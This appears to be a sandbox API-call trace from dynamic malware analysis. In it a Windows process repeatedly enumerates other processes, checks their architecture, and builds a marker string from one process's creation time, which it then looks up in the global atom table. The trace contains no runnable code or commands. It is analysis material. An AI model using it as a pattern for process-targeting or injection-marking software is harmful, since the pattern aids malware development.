	[0106.158] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0106.158] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.158] CloseHandle (hObject=0x694) returned 1
	[0106.159] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0106.159] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.159] CloseHandle (hObject=0x694) returned 1
	[0106.159] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0106.159] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.159] CloseHandle (hObject=0x694) returned 1
	[0106.194] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0106.194] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0106.194] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0106.194] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0106.194] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0106.195] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0106.195] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0106.195] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0106.195] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0106.195] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0106.195] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0106.195] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0106.196] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0106.196] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0106.196] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0106.196] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0106.196] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0106.196] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0106.196] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0106.196] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.197] CloseHandle (hObject=0x694) returned 1
	[0106.197] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0106.197] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0106.197] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0106.197] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.197] CloseHandle (hObject=0x694) returned 1
	[0106.197] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0106.197] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0106.197] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.197] CloseHandle (hObject=0x694) returned 1
	[0106.198] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0106.198] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.198] CloseHandle (hObject=0x694) returned 1
	[0106.198] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0106.198] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.198] CloseHandle (hObject=0x694) returned 1
	[0106.198] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0106.198] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.198] CloseHandle (hObject=0x694) returned 1
	[0106.198] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0106.198] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.198] CloseHandle (hObject=0x694) returned 1
	[0106.198] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0106.198] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.198] CloseHandle (hObject=0x694) returned 1
	[0106.199] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0106.199] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0106.199] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.199] CloseHandle (hObject=0x694) returned 1
	[0106.199] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0106.199] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.199] CloseHandle (hObject=0x694) returned 1
	[0106.199] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0106.199] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.199] CloseHandle (hObject=0x694) returned 1
	[0106.199] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0106.200] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.200] CloseHandle (hObject=0x694) returned 1
	[0106.200] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0106.200] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.200] CloseHandle (hObject=0x694) returned 1
	[0106.200] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0106.200] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.200] CloseHandle (hObject=0x694) returned 1
	[0106.200] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0106.200] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.200] CloseHandle (hObject=0x694) returned 1
	[0106.200] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0106.200] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.200] CloseHandle (hObject=0x694) returned 1
	[0106.201] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0106.201] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.201] CloseHandle (hObject=0x694) returned 1
	[0106.201] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0106.201] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.201] CloseHandle (hObject=0x694) returned 1
	[0106.201] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0106.201] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.201] CloseHandle (hObject=0x694) returned 1
	[0106.201] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0106.201] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.201] CloseHandle (hObject=0x694) returned 1
	[0106.201] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0106.201] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.201] CloseHandle (hObject=0x694) returned 1
	[0106.202] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0106.202] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.202] CloseHandle (hObject=0x694) returned 1
	[0106.202] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0106.202] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.202] CloseHandle (hObject=0x694) returned 1
	[0106.202] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0106.202] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.202] CloseHandle (hObject=0x694) returned 1
	[0106.202] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0106.202] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.202] CloseHandle (hObject=0x694) returned 1
	[0106.202] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0106.202] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.202] CloseHandle (hObject=0x694) returned 1
	[0106.203] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0106.203] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.203] CloseHandle (hObject=0x694) returned 1
	[0106.203] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0106.203] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.203] CloseHandle (hObject=0x694) returned 1
	[0106.203] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0106.203] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.203] CloseHandle (hObject=0x694) returned 1
	[0106.203] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0106.203] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.203] CloseHandle (hObject=0x694) returned 1
	[0106.203] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0106.203] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.204] CloseHandle (hObject=0x694) returned 1
	[0106.204] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0106.204] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0106.204] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0106.204] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0106.204] wsprintfA (in: param_1=0x3993268, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0106.205] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0106.205] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0106.205] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0106.205] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0106.205] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0106.205] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0106.205] CloseHandle (hObject=0x694) returned 1
	[0106.206] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0106.206] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0106.206] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.206] CloseHandle (hObject=0x694) returned 1
	[0106.206] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0106.206] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.206] CloseHandle (hObject=0x694) returned 1
	[0106.206] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0106.206] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.206] CloseHandle (hObject=0x694) returned 1
	[0106.243] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0106.243] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0106.243] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0106.243] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0106.243] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0106.244] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0106.244] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0106.244] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0106.244] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0106.244] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0106.244] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0106.244] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0106.245] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0106.245] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0106.246] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0106.246] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0106.247] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0106.247] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0106.247] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0106.247] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.247] CloseHandle (hObject=0x694) returned 1
	[0106.247] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0106.248] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0106.248] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0106.248] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.248] CloseHandle (hObject=0x694) returned 1
	[0106.248] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0106.248] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0106.248] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.248] CloseHandle (hObject=0x694) returned 1
	[0106.248] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0106.248] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.248] CloseHandle (hObject=0x694) returned 1
	[0106.249] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0106.249] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.249] CloseHandle (hObject=0x694) returned 1
	[0106.249] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0106.249] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.249] CloseHandle (hObject=0x694) returned 1
	[0106.249] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0106.249] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.249] CloseHandle (hObject=0x694) returned 1
	[0106.249] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0106.249] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.249] CloseHandle (hObject=0x694) returned 1
	[0106.249] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0106.250] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0106.250] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.250] CloseHandle (hObject=0x694) returned 1
	[0106.250] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0106.250] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.250] CloseHandle (hObject=0x694) returned 1
	[0106.250] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0106.250] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.250] CloseHandle (hObject=0x694) returned 1
	[0106.250] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0106.250] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.250] CloseHandle (hObject=0x694) returned 1
	[0106.251] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0106.251] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.251] CloseHandle (hObject=0x694) returned 1
	[0106.251] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0106.251] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.251] CloseHandle (hObject=0x694) returned 1
	[0106.251] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0106.251] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.251] CloseHandle (hObject=0x694) returned 1
	[0106.251] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0106.251] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.251] CloseHandle (hObject=0x694) returned 1
	[0106.252] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0106.252] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.252] CloseHandle (hObject=0x694) returned 1
	[0106.252] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0106.252] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.252] CloseHandle (hObject=0x694) returned 1
	[0106.252] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0106.252] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.252] CloseHandle (hObject=0x694) returned 1
	[0106.252] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0106.252] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.252] CloseHandle (hObject=0x694) returned 1
	[0106.252] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0106.252] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.252] CloseHandle (hObject=0x694) returned 1
	[0106.253] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0106.253] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.253] CloseHandle (hObject=0x694) returned 1
	[0106.253] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0106.253] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.253] CloseHandle (hObject=0x694) returned 1
	[0106.253] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0106.253] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.253] CloseHandle (hObject=0x694) returned 1
	[0106.253] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0106.253] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.253] CloseHandle (hObject=0x694) returned 1
	[0106.253] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0106.253] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.253] CloseHandle (hObject=0x694) returned 1
	[0106.254] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0106.254] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.254] CloseHandle (hObject=0x694) returned 1
	[0106.254] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0106.254] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.254] CloseHandle (hObject=0x694) returned 1
	[0106.254] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0106.254] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.254] CloseHandle (hObject=0x694) returned 1
	[0106.254] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0106.254] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.254] CloseHandle (hObject=0x694) returned 1
	[0106.254] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0106.254] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.254] CloseHandle (hObject=0x694) returned 1
	[0106.255] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0106.255] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0106.255] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0106.255] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0106.255] wsprintfA (in: param_1=0x39936c8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0106.256] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0106.256] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0106.256] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0106.256] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0106.256] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0106.256] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0106.256] CloseHandle (hObject=0x694) returned 1
	[0106.256] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0106.257] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0106.257] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.257] CloseHandle (hObject=0x694) returned 1
	[0106.257] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0106.257] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.257] CloseHandle (hObject=0x694) returned 1
	[0106.257] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0106.257] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0106.257] CloseHandle (hObject=0x694) returned 1
	[0106.292] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0106.293] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0106.293] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0106.293] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0106.293] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0106.293] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0106.293] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0106.294] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0106.294] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0106.294] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0106.294] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
